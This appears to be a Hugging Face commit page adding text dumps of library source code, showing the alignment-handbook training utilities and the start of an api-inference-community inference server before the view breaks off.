danidarko committed on
Commit
b1d4de0
1 Parent(s): d7abeb1

Upload 59 files

This view is limited to 50 files because it contains too many changes. See raw diff
Files changed (50)
  1. .gitattributes +4 -0
  2. huggingface_WebShop.txt +0 -0
  3. huggingface_accelerate.txt +0 -0
  4. huggingface_alignment-handbook.txt +405 -0
  5. huggingface_api-inference-community.txt +213 -0
  6. huggingface_autotrain-advanced.txt +0 -0
  7. huggingface_candle.txt +1540 -0
  8. huggingface_controlnet_aux.txt +0 -0
  9. huggingface_dataset-viewer.txt +0 -0
  10. huggingface_datasets.txt +0 -0
  11. huggingface_dataspeech.txt +220 -0
  12. huggingface_datatrove.txt +0 -0
  13. huggingface_diffusers.txt +0 -0
  14. huggingface_diffusion-fast.txt +160 -0
  15. huggingface_diffusion-models-class.txt +62 -0
  16. huggingface_distil-whisper.txt +0 -0
  17. huggingface_docmatix.txt +604 -0
  18. huggingface_evaluate.txt +0 -0
  19. huggingface_hugginface_datasets.txt +0 -0
  20. huggingface_huggingface-inference-toolkit.txt +543 -0
  21. huggingface_huggingface-llama-recipes.txt +141 -0
  22. huggingface_huggingface_hub.txt +0 -0
  23. huggingface_lerobot.txt +0 -0
  24. huggingface_lm-evaluation-harness.txt +0 -0
  25. huggingface_notebooks.txt +1057 -0
  26. huggingface_open-muse.txt +0 -0
  27. huggingface_open_asr_leaderboard.txt +882 -0
  28. huggingface_optimum-benchmark.txt +0 -0
  29. huggingface_optimum-nvidia.txt +1270 -0
  30. huggingface_optimum-quanto.txt +0 -0
  31. huggingface_optimum.txt +0 -0
  32. huggingface_peft.txt +0 -0
  33. huggingface_pixparse.txt +0 -0
  34. huggingface_pytorch-image-models.txt +0 -0
  35. huggingface_safetensors.txt +1038 -0
  36. huggingface_segment-anything-2.txt +0 -0
  37. huggingface_setfit.txt +0 -0
  38. huggingface_speech-to-speech.txt +1208 -0
  39. huggingface_text-embeddings-inference.txt +385 -0
  40. huggingface_text-generation-inference.txt +0 -0
  41. huggingface_tokenizers.txt +1157 -0
  42. huggingface_transformers-bloom-inference.txt +1235 -0
  43. huggingface_transformers.txt +3 -0
  44. huggingface_trl.txt +0 -0
  45. python_libs_keras.txt +0 -0
  46. python_libs_matplotlib.txt +0 -0
  47. python_libs_numpy.txt +0 -0
  48. python_libs_opencv.txt +0 -0
  49. python_libs_pandas.txt +0 -0
  50. python_libs_plotly.py.txt +3 -0
.gitattributes CHANGED
@@ -56,3 +56,7 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
56
  # Video files - compressed
57
  *.mp4 filter=lfs diff=lfs merge=lfs -text
58
  *.webm filter=lfs diff=lfs merge=lfs -text
59
+ huggingface_transformers.txt filter=lfs diff=lfs merge=lfs -text
60
+ python_libs_plotly.py.txt filter=lfs diff=lfs merge=lfs -text
61
+ python_libs_pytorch.txt filter=lfs diff=lfs merge=lfs -text
62
+ python_libs_tensorflow.txt filter=lfs diff=lfs merge=lfs -text
huggingface_WebShop.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_accelerate.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_alignment-handbook.txt ADDED
@@ -0,0 +1,405 @@
1
+ # File: alignment-handbook-main/src/alignment/__init__.py
2
+ __version__ = '0.3.0.dev0'
3
+ from .configs import DataArguments, DPOConfig, H4ArgumentParser, ModelArguments, SFTConfig
4
+ from .data import apply_chat_template, get_datasets
5
+ from .decontaminate import decontaminate_humaneval
6
+ from .model_utils import get_checkpoint, get_kbit_device_map, get_peft_config, get_quantization_config, get_tokenizer, is_adapter_model
7
+ __all__ = ['DataArguments', 'DPOConfig', 'H4ArgumentParser', 'ModelArguments', 'SFTConfig', 'apply_chat_template', 'get_datasets', 'decontaminate_humaneval', 'get_checkpoint', 'get_kbit_device_map', 'get_peft_config', 'get_quantization_config', 'get_tokenizer', 'is_adapter_model']
8
+
9
+ # File: alignment-handbook-main/src/alignment/configs.py
10
+ import dataclasses
11
+ import os
12
+ import sys
13
+ from dataclasses import dataclass, field
14
+ from typing import Any, Dict, List, NewType, Optional, Tuple
15
+ from transformers import MODEL_FOR_CAUSAL_LM_MAPPING, HfArgumentParser
16
+ import trl
17
+ MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
18
+ MODEL_TYPES = tuple((conf.model_type for conf in MODEL_CONFIG_CLASSES))
19
+ DataClassType = NewType('DataClassType', Any)
20
+
21
+ class H4ArgumentParser(HfArgumentParser):
22
+
23
+ def parse_yaml_and_args(self, yaml_arg: str, other_args: Optional[List[str]]=None) -> List[dataclass]:
24
+ arg_list = self.parse_yaml_file(os.path.abspath(yaml_arg))
25
+ outputs = []
26
+ other_args = {arg.split('=')[0].strip('-'): arg.split('=')[1] for arg in other_args}
27
+ used_args = {}
28
+ for (data_yaml, data_class) in zip(arg_list, self.dataclass_types):
29
+ keys = {f.name for f in dataclasses.fields(data_yaml) if f.init}
30
+ inputs = {k: v for (k, v) in vars(data_yaml).items() if k in keys}
31
+ for (arg, val) in other_args.items():
32
+ if arg in keys:
33
+ base_type = data_yaml.__dataclass_fields__[arg].type
34
+ inputs[arg] = val
35
+ if base_type in [int, float]:
36
+ inputs[arg] = base_type(val)
37
+ if base_type == List[str]:
38
+ inputs[arg] = [str(v) for v in val.split(',')]
39
+ if base_type is bool:
40
+ if val in ['true', 'True']:
41
+ inputs[arg] = True
42
+ else:
43
+ inputs[arg] = False
44
+ if arg not in used_args:
45
+ used_args[arg] = val
46
+ else:
47
+ raise ValueError(f'Duplicate argument provided: {arg}, may cause unexpected behavior')
48
+ obj = data_class(**inputs)
49
+ outputs.append(obj)
50
+ return outputs
51
+
52
+ def parse(self) -> DataClassType | Tuple[DataClassType]:
53
+ if len(sys.argv) == 2 and sys.argv[1].endswith('.yaml'):
54
+ output = self.parse_yaml_file(os.path.abspath(sys.argv[1]))
55
+ elif len(sys.argv) > 2 and sys.argv[1].endswith('.yaml'):
56
+ output = self.parse_yaml_and_args(os.path.abspath(sys.argv[1]), sys.argv[2:])
57
+ else:
58
+ output = self.parse_args_into_dataclasses()
59
+ if len(output) == 1:
60
+ output = output[0]
61
+ return output
62
+
63
+ @dataclass
64
+ class ModelArguments:
65
+ base_model_revision: Optional[str] = field(default=None, metadata={'help': 'The base model checkpoint for weights initialization with PEFT adapters.'})
66
+ model_name_or_path: Optional[str] = field(default=None, metadata={'help': "The model checkpoint for weights initialization. Don't set if you want to train a model from scratch."})
67
+ model_revision: str = field(default='main', metadata={'help': 'The specific model version to use (can be a branch name, tag name or commit id).'})
68
+ model_code_revision: str = field(default=None, metadata={'help': 'The branch of the IFT model'})
69
+ torch_dtype: Optional[str] = field(default=None, metadata={'help': "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the dtype will be automatically derived from the model's weights.", 'choices': ['auto', 'bfloat16', 'float16', 'float32']})
70
+ tokenizer_name_or_path: Optional[str] = field(default=None, metadata={'help': 'The path to the tokenizer. Useful if you want to use a different tokenizer to the one stored in `model_name_or_path`.'})
71
+ trust_remote_code: bool = field(default=False, metadata={'help': 'Trust remote code when loading a model.'})
72
+ attn_implementation: Optional[str] = field(default=None, metadata={'help': 'Which attention implementation to use; you can use --attn_implementation=flash_attention_2, in which case you must install this manually by running `pip install flash-attn --no-build-isolation`'})
73
+ use_peft: bool = field(default=False, metadata={'help': 'Whether to use PEFT or not for training.'})
74
+ lora_r: Optional[int] = field(default=16, metadata={'help': 'LoRA R value.'})
75
+ lora_alpha: Optional[int] = field(default=32, metadata={'help': 'LoRA alpha.'})
76
+ lora_dropout: Optional[float] = field(default=0.05, metadata={'help': 'LoRA dropout.'})
77
+ lora_target_modules: Optional[List[str]] = field(default=None, metadata={'help': 'LoRA target modules.'})
78
+ lora_modules_to_save: Optional[List[str]] = field(default=None, metadata={'help': 'Model layers to unfreeze & train'})
79
+ load_in_8bit: bool = field(default=False, metadata={'help': 'use 8 bit precision'})
80
+ load_in_4bit: bool = field(default=False, metadata={'help': 'use 4 bit precision'})
81
+ bnb_4bit_quant_type: Optional[str] = field(default='nf4', metadata={'help': 'specify the quantization type (fp4 or nf4)'})
82
+ use_bnb_nested_quant: bool = field(default=False, metadata={'help': 'use nested quantization'})
83
+ bnb_4bit_quant_storage: Optional[str] = field(default='uint8', metadata={'help': 'storage type to pack the quantized 4-bit params.'})
84
+
85
+ def __post_init__(self):
86
+ if self.load_in_8bit and self.load_in_4bit:
87
+ raise ValueError("You can't use 8 bit and 4 bit precision at the same time")
88
+
89
+ @dataclass
90
+ class DataArguments:
91
+ chat_template: Optional[str] = field(default=None, metadata={'help': 'The chat template to use.'})
92
+ dataset_mixer: Optional[Dict[str, float]] = field(default=None, metadata={'help': 'Datasets and their proportions to be used for training ift/rl.'})
93
+ text_column: Optional[str] = field(default='text', metadata={'help': 'The column name to use for the text in the dataset (only used for continued pretraining).'})
94
+ dataset_splits: Optional[List[str]] = field(default_factory=lambda : ['train', 'test'], metadata={'help': 'List of train test splits to use in the dataset'})
95
+ dataset_configs: Optional[List[str]] = field(default=None, metadata={'help': "List of dataset config names. If given must be the same length as 'dataset_mixer' keys."})
96
+ preprocessing_num_workers: Optional[int] = field(default=None, metadata={'help': 'The number of processes to use for the preprocessing.'})
97
+ truncation_side: Optional[str] = field(default=None, metadata={'help': 'Truncation side to use for the tokenizer.'})
98
+ auto_insert_empty_system_msg: bool = field(default=True, metadata={'help': 'Whether to automatically insert an empty system message as the first message if `system` is mentioned in the chat template.'})
99
+
100
+ @dataclass
101
+ class SFTConfig(trl.SFTConfig):
102
+ hub_model_revision: Optional[str] = field(default='main', metadata={'help': 'The Hub model branch to push the model to.'})
103
+ logging_first_step: bool = field(default=True, metadata={'help': 'Whether to log and evaluate the first global_step or not.'})
104
+
105
+ @dataclass
106
+ class DPOConfig(trl.DPOConfig):
107
+ hub_model_revision: Optional[str] = field(default='main', metadata={'help': 'The Hub model branch to push the model to.'})
108
+ logging_first_step: bool = field(default=True, metadata={'help': 'Whether to log and evaluate the first global_step or not.'})
109
+ optim: Optional[str] = field(default='rmsprop')
110
+ remove_unused_columns: bool = field(default=False)
111
+
112
+ # File: alignment-handbook-main/src/alignment/data.py
113
+ import os
114
+ from typing import Any, List, Literal, Optional
115
+ from datasets import DatasetDict, concatenate_datasets, load_dataset, load_from_disk
116
+ from datasets.builder import DatasetGenerationError
117
+ from .configs import DataArguments
118
+ DEFAULT_CHAT_TEMPLATE = "{% for message in messages %}\n{% if message['role'] == 'user' %}\n{{ '<|user|>\n' + message['content'] + eos_token }}\n{% elif message['role'] == 'system' %}\n{{ '<|system|>\n' + message['content'] + eos_token }}\n{% elif message['role'] == 'assistant' %}\n{{ '<|assistant|>\n' + message['content'] + eos_token }}\n{% endif %}\n{% if loop.last and add_generation_prompt %}\n{{ '<|assistant|>' }}\n{% endif %}\n{% endfor %}"
119
+
120
+ def maybe_insert_system_message(messages, tokenizer):
121
+ if messages[0]['role'] == 'system':
122
+ return
123
+ chat_template = tokenizer.chat_template
124
+ if chat_template is None:
125
+ chat_template = tokenizer.get_chat_template()
126
+ if 'system' in chat_template or '<|im_start|>' in chat_template:
127
+ messages.insert(0, {'role': 'system', 'content': ''})
128
+
129
+ def apply_chat_template(example, tokenizer, task: Literal['sft', 'generation', 'rm', 'dpo'], auto_insert_empty_system_msg: bool=True):
130
+ if task in ['sft', 'generation']:
131
+ messages = example['messages']
132
+ if auto_insert_empty_system_msg:
133
+ maybe_insert_system_message(messages, tokenizer)
134
+ example['text'] = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True if task == 'generation' else False)
135
+ elif task == 'rm':
136
+ if all((k in example.keys() for k in ('chosen', 'rejected'))):
137
+ chosen_messages = example['chosen']
138
+ rejected_messages = example['rejected']
139
+ if auto_insert_empty_system_msg:
140
+ maybe_insert_system_message(chosen_messages, tokenizer)
141
+ maybe_insert_system_message(rejected_messages, tokenizer)
142
+ example['text_chosen'] = tokenizer.apply_chat_template(chosen_messages, tokenize=False)
143
+ example['text_rejected'] = tokenizer.apply_chat_template(rejected_messages, tokenize=False)
144
+ else:
145
+ raise ValueError(f'Could not format example as dialogue for `rm` task! Require `[chosen, rejected]` keys but found {list(example.keys())}')
146
+ elif task in ['dpo', 'orpo']:
147
+ if all((k in example.keys() for k in ('chosen', 'rejected'))):
148
+ if not is_openai_format(example['chosen']) or not is_openai_format(example['rejected']):
149
+ raise ValueError(f'Could not format example as dialogue for `{task}` task! Require OpenAI format for all messages')
150
+ if 'prompt' in example and is_openai_format(example['prompt']):
151
+ prompt_messages = example['prompt']
152
+ chosen_messages = example['chosen']
153
+ rejected_messages = example['rejected']
154
+ else:
155
+ prompt_messages = example['chosen'][:-1]
156
+ chosen_messages = example['chosen'][-1:]
157
+ rejected_messages = example['rejected'][-1:]
158
+ if auto_insert_empty_system_msg:
159
+ maybe_insert_system_message(prompt_messages, tokenizer)
160
+ example['text_prompt'] = tokenizer.apply_chat_template(prompt_messages, tokenize=False)
161
+ example['text_chosen'] = tokenizer.apply_chat_template(chosen_messages, tokenize=False)
162
+ example['text_rejected'] = tokenizer.apply_chat_template(rejected_messages, tokenize=False)
163
+ else:
164
+ raise ValueError(f'Could not format example as dialogue for `{task}` task! Require either the `[chosen, rejected]` or `[prompt, chosen, rejected]` keys but found {list(example.keys())}')
165
+ else:
166
+ raise ValueError(f"Task {task} not supported, please ensure that the provided task is one of ['sft', 'generation', 'rm', 'dpo', 'orpo']")
167
+ return example
168
+
169
+ def is_openai_format(messages: Any) -> bool:
170
+ if isinstance(messages, list) and all((isinstance(message, dict) for message in messages)):
171
+ return all(('role' in message and 'content' in message for message in messages))
172
+ return False
173
+
174
+ def get_datasets(data_config: DataArguments | dict, splits: Optional[List[str]]=None, configs: Optional[List[str]]=None, columns_to_keep: Optional[List[str]]=None, shuffle: bool=True) -> DatasetDict:
175
+ if type(data_config) is DataArguments:
176
+ dataset_mixer = data_config.dataset_mixer
177
+ elif isinstance(data_config, dict):
178
+ dataset_mixer = data_config
179
+ else:
180
+ raise ValueError(f'Data config {data_config} not recognized.')
181
+ raw_datasets = mix_datasets(dataset_mixer, splits=splits, configs=configs, columns_to_keep=columns_to_keep, shuffle=shuffle)
182
+ return raw_datasets
183
+
184
+ def mix_datasets(dataset_mixer: dict, splits: Optional[List[str]]=None, configs: Optional[List[str]]=None, columns_to_keep: Optional[List[str]]=None, shuffle=True) -> DatasetDict:
185
+ splits = ['train', 'test'] if splits is None else splits
186
+ configs = [None] * len(dataset_mixer) if not configs else configs
187
+ columns_to_keep = [] if columns_to_keep is None else columns_to_keep
188
+ if configs is not None and len(configs) != len(dataset_mixer):
189
+ raise ValueError('The number of given dataset config names must be the same as the given number of datasets.')
190
+ raw_datasets = DatasetDict()
191
+ raw_train_datasets = []
192
+ raw_val_datasets = []
193
+ fracs = []
194
+ for ((ds, frac), ds_config) in zip(dataset_mixer.items(), configs):
195
+ fracs.append(frac)
196
+ for split in splits:
197
+ try:
198
+ dataset = load_dataset(ds, ds_config, split=split)
199
+ except DatasetGenerationError:
200
+ dataset = load_from_disk(os.path.join(ds, split))
201
+ dataset = dataset.remove_columns([col for col in dataset.column_names if col not in columns_to_keep])
202
+ if 'train' in split:
203
+ raw_train_datasets.append(dataset)
204
+ elif 'test' in split:
205
+ raw_val_datasets.append(dataset)
206
+ else:
207
+ raise ValueError(f'Split type {split} not recognized as one of test or train.')
208
+ if any((frac < 0 for frac in fracs)):
209
+ raise ValueError('Dataset fractions cannot be negative.')
210
+ if len(raw_train_datasets) > 0:
211
+ train_subsets = []
212
+ for (dataset, frac) in zip(raw_train_datasets, fracs):
213
+ train_subset = dataset.select(range(int(frac * len(dataset))))
214
+ train_subsets.append(train_subset)
215
+ if shuffle:
216
+ raw_datasets['train'] = concatenate_datasets(train_subsets).shuffle(seed=42)
217
+ else:
218
+ raw_datasets['train'] = concatenate_datasets(train_subsets)
219
+ if len(raw_val_datasets) > 0:
220
+ if shuffle:
221
+ raw_datasets['test'] = concatenate_datasets(raw_val_datasets).shuffle(seed=42)
222
+ else:
223
+ raw_datasets['test'] = concatenate_datasets(raw_val_datasets)
224
+ if len(raw_datasets) == 0:
225
+ raise ValueError(f'Dataset {dataset_mixer} not recognized with splits {splits}. Check the dataset has been correctly formatted.')
226
+ return raw_datasets
227
+
228
+ # File: alignment-handbook-main/src/alignment/decontaminate.py
229
+ from typing import Any, Dict, List
230
+ from datasets import load_dataset
231
+ HUMAN_EVAL_STRINGS_OK = ['return x + y', 'return len(string)', 'return n**2', 'return .join(strings)']
232
+
233
+ def extract_docstring(prompt: str) -> str:
234
+ if '"""' in prompt:
235
+ if prompt.count('"""') == 2:
236
+ return prompt.split('"""')[1].strip()
237
+ elif prompt.count('"""') == 4:
238
+ return prompt.split('"""')[3].strip()
239
+ else:
240
+ raise ValueError()
241
+ elif "'''" in prompt:
242
+ assert prompt.count("'''") == 2
243
+ return prompt.split("'''")[1].strip()
244
+ else:
245
+ raise ValueError()
246
+
247
+ def human_eval_docstrings() -> List[str]:
248
+ ds = load_dataset('openai_humaneval', split='test')
249
+ docstrings = [extract_docstring(v['prompt']) for v in ds]
250
+ return docstrings
251
+
252
+ def load_dataset_column(dataset: str, column: str, split: str, name=None) -> List[str]:
253
+ ds = load_dataset(dataset, split=split, name=name)
254
+ res = [sample[column].strip() for sample in ds]
255
+ return [sample for sample in res if len(sample) > 0]
256
+ FILTER_OUT = {'human_eval_docstrings': human_eval_docstrings(), 'human_eval_solutions': [s for s in load_dataset_column('openai_humaneval', 'canonical_solution', 'test') if s not in HUMAN_EVAL_STRINGS_OK]}
257
+
258
+ def normalize_whitespace(text: str) -> str:
259
+ return ' '.join(text.split())
260
+
261
+ def decontaminate_humaneval(samples: List[Dict[str, Any]], text_column: str='text', filter_out: Dict[str, List[str]]=FILTER_OUT) -> List[Dict[str, Any]]:
262
+ output = []
263
+ for content in samples[text_column]:
264
+ content = normalize_whitespace(content.lower())
265
+ matched = False
266
+ for (_, substrings) in filter_out.items():
267
+ for substring in substrings:
268
+ if normalize_whitespace(substring.lower()) in content:
269
+ matched = True
270
+ break
271
+ if matched:
272
+ break
273
+ output.append(not matched)
274
+ return output
275
+
276
+ # File: alignment-handbook-main/src/alignment/model_utils.py
277
+ import os
278
+ from pathlib import Path
279
+ from typing import Dict
280
+ import torch
281
+ from transformers import AutoTokenizer, BitsAndBytesConfig, PreTrainedTokenizer
282
+ from transformers.trainer_utils import get_last_checkpoint
283
+ from accelerate import Accelerator
284
+ from huggingface_hub import list_repo_files
285
+ from huggingface_hub.utils._errors import RepositoryNotFoundError
286
+ from huggingface_hub.utils._validators import HFValidationError
287
+ from peft import LoraConfig, PeftConfig
288
+ from .configs import DataArguments, DPOConfig, ModelArguments, SFTConfig
289
+ from .data import DEFAULT_CHAT_TEMPLATE
290
+
291
+ def get_current_device() -> int:
292
+ return Accelerator().local_process_index if torch.cuda.is_available() else 'cpu'
293
+
294
+ def get_kbit_device_map() -> Dict[str, int] | None:
295
+ return {'': get_current_device()} if torch.cuda.is_available() else None
296
+
297
+ def get_quantization_config(model_args: ModelArguments) -> BitsAndBytesConfig | None:
298
+ if model_args.load_in_4bit:
299
+ compute_dtype = torch.float16
300
+ if model_args.torch_dtype not in {'auto', None}:
301
+ compute_dtype = getattr(torch, model_args.torch_dtype)
302
+ quantization_config = BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_compute_dtype=compute_dtype, bnb_4bit_quant_type=model_args.bnb_4bit_quant_type, bnb_4bit_use_double_quant=model_args.use_bnb_nested_quant, bnb_4bit_quant_storage=model_args.bnb_4bit_quant_storage).to_dict()
303
+ elif model_args.load_in_8bit:
304
+ quantization_config = BitsAndBytesConfig(load_in_8bit=True).to_dict()
305
+ else:
306
+ quantization_config = None
307
+ return quantization_config
308
+
309
+ def get_tokenizer(model_args: ModelArguments, data_args: DataArguments, auto_set_chat_template: bool=True) -> PreTrainedTokenizer:
310
+ tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path if model_args.tokenizer_name_or_path is None else model_args.tokenizer_name_or_path, revision=model_args.model_revision, trust_remote_code=model_args.trust_remote_code)
311
+ if tokenizer.pad_token_id is None:
312
+ tokenizer.pad_token_id = tokenizer.eos_token_id
313
+ if data_args.truncation_side is not None:
314
+ tokenizer.truncation_side = data_args.truncation_side
315
+ if tokenizer.model_max_length > 100000:
316
+ tokenizer.model_max_length = 2048
317
+ if data_args.chat_template is not None:
318
+ tokenizer.chat_template = data_args.chat_template
319
+ elif auto_set_chat_template and tokenizer.get_chat_template() is None:
320
+ tokenizer.chat_template = DEFAULT_CHAT_TEMPLATE
321
+ return tokenizer
322
+
323
+ def get_peft_config(model_args: ModelArguments) -> PeftConfig | None:
324
+ if model_args.use_peft is False:
325
+ return None
326
+ peft_config = LoraConfig(r=model_args.lora_r, lora_alpha=model_args.lora_alpha, lora_dropout=model_args.lora_dropout, bias='none', task_type='CAUSAL_LM', target_modules=model_args.lora_target_modules, modules_to_save=model_args.lora_modules_to_save)
327
+ return peft_config
328
+
329
+ def is_adapter_model(model_name_or_path: str, revision: str='main') -> bool:
330
+ try:
331
+ repo_files = list_repo_files(model_name_or_path, revision=revision)
332
+ except (HFValidationError, RepositoryNotFoundError):
333
+ repo_files = os.listdir(model_name_or_path)
334
+ return 'adapter_model.safetensors' in repo_files or 'adapter_model.bin' in repo_files
335
+
336
+ def get_checkpoint(training_args: SFTConfig | DPOConfig) -> Path | None:
337
+ last_checkpoint = None
338
+ if os.path.isdir(training_args.output_dir):
339
+ last_checkpoint = get_last_checkpoint(training_args.output_dir)
340
+ return last_checkpoint
341
+
342
+ # File: alignment-handbook-main/src/alignment/release.py
343
+ import argparse
344
+ import re
345
+ import packaging.version
346
+ REPLACE_PATTERNS = {'init': (re.compile('^__version__\\s+=\\s+"([^"]+)"\\s*$', re.MULTILINE), '__version__ = "VERSION"\n'), 'setup': (re.compile('^(\\s*)version\\s*=\\s*"[^"]+",', re.MULTILINE), '\\1version="VERSION",'), 'citation': (re.compile('^version:\\s+[^ ]+', re.MULTILINE), 'version: VERSION'), 'readme': (re.compile('version\\s+=\\s+\\{[^}]+\\}', re.MULTILINE), 'version = {VERSION}')}
347
+ README_FILE = 'README.md'
348
+ REPLACE_FILES = {'init': 'src/alignment/__init__.py', 'setup': 'setup.py', 'citation': 'CITATION.cff', 'readme': README_FILE}
349
+
350
+ def update_version_in_file(fname, version, pattern):
351
+ with open(fname, 'r', encoding='utf-8', newline='\n') as f:
352
+ code = f.read()
353
+ (re_pattern, replace) = REPLACE_PATTERNS[pattern]
354
+ replace = replace.replace('VERSION', version)
355
+ code = re_pattern.sub(replace, code)
356
+ with open(fname, 'w', encoding='utf-8', newline='\n') as f:
357
+ f.write(code)
358
+
359
+ def global_version_update(version, patch=False):
360
+ for (pattern, fname) in REPLACE_FILES.items():
361
+ update_version_in_file(fname, version, pattern)
362
+
363
+ def get_version():
364
+ with open(REPLACE_FILES['init'], 'r') as f:
365
+ code = f.read()
366
+ default_version = REPLACE_PATTERNS['init'][0].search(code).groups()[0]
367
+ return packaging.version.parse(default_version)
368
+
369
+ def pre_release_work(patch=False):
370
+ default_version = get_version()
371
+ if patch and default_version.is_devrelease:
372
+ raise ValueError("Can't create a patch version from the dev branch, checkout a released version!")
373
+ if default_version.is_devrelease:
374
+ default_version = default_version.base_version
375
+ elif patch:
376
+ default_version = f'{default_version.major}.{default_version.minor}.{default_version.micro + 1}'
377
+ else:
378
+ default_version = f'{default_version.major}.{default_version.minor + 1}.0'
379
+ version = input(f'Which version are you releasing? [{default_version}]')
380
+ if len(version) == 0:
381
+ version = default_version
382
+ print(f'Updating version to {version}.')
383
+ global_version_update(version, patch=patch)
384
+
385
+ def post_release_work():
386
+ current_version = get_version()
387
+ dev_version = f'{current_version.major}.{current_version.minor + 1}.0.dev0'
388
+ current_version = current_version.base_version
389
+ version = input(f'Which version are we developing now? [{dev_version}]')
390
+ if len(version) == 0:
391
+ version = dev_version
392
+ print(f'Updating version to {version}.')
393
+ global_version_update(version)
394
+ if __name__ == '__main__':
395
+ parser = argparse.ArgumentParser()
396
+ parser.add_argument('--post_release', action='store_true', help='Whether this is pre or post release.')
397
+ parser.add_argument('--patch', action='store_true', help='Whether or not this is a patch release.')
398
+ args = parser.parse_args()
399
+ if not args.post_release:
400
+ pre_release_work(patch=args.patch)
401
+ elif args.patch:
402
+ print('Nothing to do after a patch :-)')
403
+ else:
404
+ post_release_work()
405
+
huggingface_api-inference-community.txt ADDED
@@ -0,0 +1,213 @@
1
+ # File: api-inference-community-master-old/main.py
2
+ import json
3
+ import os
4
+ import tempfile
5
+ import time
6
+ from io import BytesIO
7
+ from mimetypes import guess_extension
8
+ from typing import Any, Dict, List, Optional, Tuple
9
+ import librosa
10
+ import psutil
11
+ import requests
12
+ import soundfile
13
+ import timm
14
+ import torch
15
+ import uvicorn
16
+ from asteroid import separate
17
+ from asteroid.models import BaseModel as AsteroidBaseModel
18
+ from espnet2.bin.asr_inference import Speech2Text
19
+ from espnet2.bin.tts_inference import Text2Speech
20
+ from PIL import Image
21
+ from starlette.applications import Starlette
22
+ from starlette.background import BackgroundTask
23
+ from starlette.middleware import Middleware
24
+ from starlette.middleware.cors import CORSMiddleware
25
+ from starlette.requests import Request
26
+ from starlette.responses import FileResponse, JSONResponse
27
+ from starlette.routing import Route
28
+ from transformers import Speech2TextForConditionalGeneration, Speech2TextProcessor, Wav2Vec2ForCTC, Wav2Vec2Tokenizer
29
+ HF_HEADER_COMPUTE_TIME = 'x-compute-time'
30
+ AnyModel = Any
31
+ AnyTokenizer = Any
32
+ EXAMPLE_TTS_EN_MODEL_ID = 'julien-c/ljspeech_tts_train_tacotron2_raw_phn_tacotron_g2p_en_no_space_train'
33
+ EXAMPLE_TTS_ZH_MODEL_ID = 'julien-c/kan-bayashi_csmsc_tacotron2'
34
+ EXAMPLE_ASR_EN_MODEL_ID = 'julien-c/mini_an4_asr_train_raw_bpe_valid'
35
+ EXAMPLE_SEP_ENH_MODEL_ID = 'mhu-coder/ConvTasNet_Libri1Mix_enhsingle'
36
+ EXAMPLE_SEP_SEP_MODEL_ID = 'julien-c/DPRNNTasNet-ks16_WHAM_sepclean'
37
+ WAV2VEV2_MODEL_IDS = ['facebook/wav2vec2-base-960h', 'facebook/wav2vec2-large-960h-lv60-self', 'facebook/wav2vec2-large-xlsr-53-dutch', 'facebook/wav2vec2-large-xlsr-53-french', 'facebook/wav2vec2-large-xlsr-53-german', 'facebook/wav2vec2-large-xlsr-53-italian', 'facebook/wav2vec2-large-xlsr-53-spanish', 'facebook/wav2vec2-large-xlsr-53-portuguese']
38
+ SPEECH_TO_TEXT_MODEL_IDS = ['facebook/s2t-small-librispeech-asr', 'facebook/s2t-medium-librispeech-asr', 'facebook/s2t-large-librispeech-asr', 'facebook/s2t-small-mustc-en-de-st', 'facebook/s2t-small-mustc-en-es-st', 'facebook/s2t-small-mustc-en-fr-st', 'facebook/s2t-small-mustc-en-it-st', 'facebook/s2t-small-mustc-en-nl-st', 'facebook/s2t-small-mustc-en-pt-st', 'facebook/s2t-small-mustc-en-ro-st', 'facebook/s2t-small-mustc-en-ru-st']
39
+ with open('data/imagenet-simple-labels.json') as f:
40
+ IMAGENET_LABELS: List[str] = json.load(f)
41
+ TTS_MODELS: Dict[str, AnyModel] = {}
42
+ ASR_MODELS: Dict[str, AnyModel] = {}
43
+ SEP_MODELS: Dict[str, AnyModel] = {}
44
+ ASR_HF_MODELS: Dict[str, Tuple[AnyModel, AnyTokenizer]] = {}
45
+ TIMM_MODELS: Dict[str, torch.nn.Module] = {}
46
+
47
+ def home(request: Request):
48
+ return JSONResponse({'ok': True})
49
+
50
+ def health(_):
51
+ process = psutil.Process(os.getpid())
52
+ mem_info = process.memory_info()
53
+ return JSONResponse({**process.as_dict(attrs=['memory_percent']), 'rss': mem_info.rss})
54
+
55
+ def list_models(_):
56
+ all_models = {**TTS_MODELS, **ASR_MODELS, **SEP_MODELS, **{k: v[0] for (k, v) in ASR_HF_MODELS.items()}, **TIMM_MODELS}
57
+ return JSONResponse({k: v.__class__.__name__ for (k, v) in all_models.items()})
58
+
59
+ async def post_inference_tts(request: Request, model: AnyModel):
60
+ start = time.time()
61
+ try:
62
+ body = await request.json()
63
+ except:
64
+ return JSONResponse(status_code=400, content='Invalid JSON body')
65
+ print(body)
66
+ text = body['text']
67
+ outputs = model(text)
68
+ speech = outputs[0]
69
+ with tempfile.NamedTemporaryFile(suffix='.wav', delete=False) as tmp:
70
+ soundfile.write(tmp.name, speech.numpy(), model.fs, 'PCM_16')
71
+ return FileResponse(tmp.name, headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)}, background=BackgroundTask(lambda f: os.unlink(f), tmp.name))
72
+
73
+ async def post_inference_asr(request: Request, model_id: str):
74
+ start = time.time()
75
+ content_type = request.headers['content-type'].split(';')[0]
76
+ if content_type == 'application/json':
77
+ body = await request.json()
78
+ if 'url' not in body:
79
+ return JSONResponse({'ok': False, 'message': f'Invalid json, no url key'}, status_code=400)
80
+ url = body['url']
81
+ r = requests.get(url, stream=True)
82
+ file_ext: Optional[str] = guess_extension(r.headers.get('content-type', ''), strict=False)
83
+ blob = r.content
84
+ else:
85
+ file_ext: Optional[str] = guess_extension(content_type, strict=False)
86
+ try:
87
+ blob = await request.body()
88
+ except Exception as exc:
89
+ return JSONResponse({'ok': False, 'message': f'Invalid body: {exc}'}, status_code=400)
90
+ with tempfile.NamedTemporaryFile(suffix=file_ext) as tmp:
91
+ print(tmp, tmp.name)
92
+ tmp.write(blob)
93
+ tmp.flush()
94
+ try:
95
+ (speech, rate) = soundfile.read(tmp.name, dtype='float32')
96
+ except:
97
+ try:
